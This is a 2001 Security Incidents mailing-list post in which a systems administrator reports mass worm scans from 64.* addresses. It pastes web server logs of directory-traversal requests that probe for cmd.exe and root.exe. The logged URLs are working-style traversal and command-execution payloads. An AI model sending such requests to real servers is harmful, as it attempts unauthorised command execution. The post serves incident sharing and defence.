Security Incidents mailing list archives
massive cmd.exe and root.exe attempts
From: "Patrick Beam" <pbeam () agea com>
Date: Tue, 18 Sep 2001 12:05:55 -0500
I am as well being hit by this worm. Everything seems to be coming from the same class A 64.*. I have already seen 1500 plus scans to my web servers and that number is climbing rather fast. This seemed to suddenly pop up with little or no warning? In the past days I have seen a few scans here and there but nothing of this magnitude I am wondering what suddenly changed to cause this type of outbreak? 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 Patrick Beam Senior Systems Administrator Agea Corp. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- massive cmd.exe and root.exe attempts Patrick Beam (Sep 18)
- Re: massive cmd.exe and root.exe attempts Sean Kelly (Sep 18)
- Re: massive cmd.exe and root.exe attempts screamer (Sep 18)
- Re: massive cmd.exe and root.exe attempts Sean Kelly (Sep 18)